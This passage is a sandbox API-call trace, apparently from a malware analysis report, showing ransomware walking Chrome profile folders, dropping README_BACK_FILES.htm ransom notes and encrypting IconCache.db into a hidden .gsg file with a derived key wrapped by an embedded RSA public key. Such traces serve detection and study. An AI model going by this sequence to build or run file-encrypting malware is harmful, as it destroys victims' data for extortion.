FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.686] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.686] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.686] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.686] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.686] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.687] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.687] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.687] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.687] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\readme_back_files.htm")) returned 0xffffffff [0265.687] AreFileApisANSI () returned 1 [0265.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0265.687] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.688] GetFileType (hFile=0x5d44) returned 0x1 [0265.688] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.690] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.690] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.690] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.690] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.690] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\Unindexed Rules\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fbc0 [0265.690] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0265.690] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0265.690] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0265.690] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\Unindexed Rules\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\subresource filter\\unindexed rules\\readme_back_files.htm")) returned 0xffffffff [0265.691] AreFileApisANSI () returned 1 [0265.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e7a500, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 118 [0265.691] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\Unindexed Rules\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\subresource filter\\unindexed rules\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0265.693] GetFileType (hFile=0x5d48) returned 0x1 [0265.693] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0265.694] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.694] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.694] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\subresource filter\\readme_back_files.htm")) returned 0xffffffff [0265.694] AreFileApisANSI () returned 1 [0265.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0265.694] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\subresource filter\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.695] GetFileType (hFile=0x5d44) returned 0x1 [0265.695] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.697] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.697] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.697] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.697] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.697] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.697] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\swreporter\\readme_back_files.htm")) returned 0xffffffff [0265.697] AreFileApisANSI () returned 1 [0265.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0265.697] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\swreporter\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.698] GetFileType (hFile=0x5d44) returned 0x1 [0265.698] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.700] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0265.700] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fb00 [0265.700] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0265.700] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0265.700] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.700] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\readme_back_files.htm")) returned 0xffffffff [0265.700] AreFileApisANSI () returned 1 [0265.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0265.701] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0265.702] GetFileType (hFile=0x5d44) returned 0x1 [0265.702] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0265.703] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0265.703] FindClose (in: hFindFile=0x2938378 | out: hFindFile=0x2938378) returned 1 [0265.704] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\readme_back_files.htm")) returned 0xffffffff [0265.704] AreFileApisANSI () returned 1 [0265.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0265.704] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0265.706] GetFileType (hFile=0x5d3c) returned 0x1 [0265.706] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0265.707] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0265.707] FindClose (in: hFindFile=0x29383f8 | out: hFindFile=0x29383f8) returned 1 [0265.707] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\readme_back_files.htm")) returned 0xffffffff [0265.707] AreFileApisANSI () returned 1 [0265.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6ab0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0265.707] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0265.708] GetFileType (hFile=0x5d14) returned 0x1 [0265.709] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0265.710] FindNextFileA (in: hFindFile=0x2938838, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0265.710] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\CrashReports\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fb00 [0265.710] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0265.710] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0265.710] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0265.710] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\CrashReports\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\crashreports\\readme_back_files.htm")) returned 0xffffffff [0265.710] AreFileApisANSI () returned 1 [0265.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0265.710] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\CrashReports\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\crashreports\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0265.712] GetFileType (hFile=0x5d14) returned 0x1 [0265.712] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0265.713] FindNextFileA (in: hFindFile=0x2938838, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0265.713] FindClose (in: hFindFile=0x2938838 | out: hFindFile=0x2938838) returned 1 [0265.713] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\readme_back_files.htm")) returned 0xffffffff [0265.713] AreFileApisANSI () returned 1 [0265.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0265.713] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0265.715] GetFileType (hFile=0x5d10) returned 0x1 [0265.715] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0265.716] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0265.716] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\History\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0xffffffff [0265.716] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\History\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\history\\readme_back_files.htm")) returned 0xffffffff [0265.717] AreFileApisANSI () returned 1 [0265.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6d18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0265.717] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\History\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\history\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0265.719] GetFileType (hFile=0x5d10) returned 0x1 [0265.719] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0265.720] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0265.720] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0265.720] GetLastError () returned 0x0 [0265.720] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db")) returned 0x22 [0265.720] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 1 [0265.721] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0265.722] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\iconcache.db.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0265.722] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\IconCache.db.gsg", dwFileAttributes=0x2) returned 1 [0265.723] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2e7a500) returned 1 [0265.725] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0265.725] lstrlenA (lpString="PvMwiXwJkKzPixDiGqwlDZbNzMlQm") returned 29 [0265.725] CryptHashData (hHash=0x2e7fb00, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.725] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fb00, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2e7fc00) returned 1 [0265.726] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.726] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0265.726] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2e77530) returned 1 [0265.726] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77530, dwCertEncodingType=0x1, pInfo=0x2eb0c30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb0c60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb0c68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2e7e9c0) returned 1 [0265.726] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0265.726] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e775b8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2e775b8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0265.726] WriteFile (in: hFile=0x5d14, lpBuffer=0x2e775b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2e775b8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0265.727] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.728] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.729] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.737] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.737] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.737] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.737] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.738] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.738] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.738] CryptEncrypt (in: 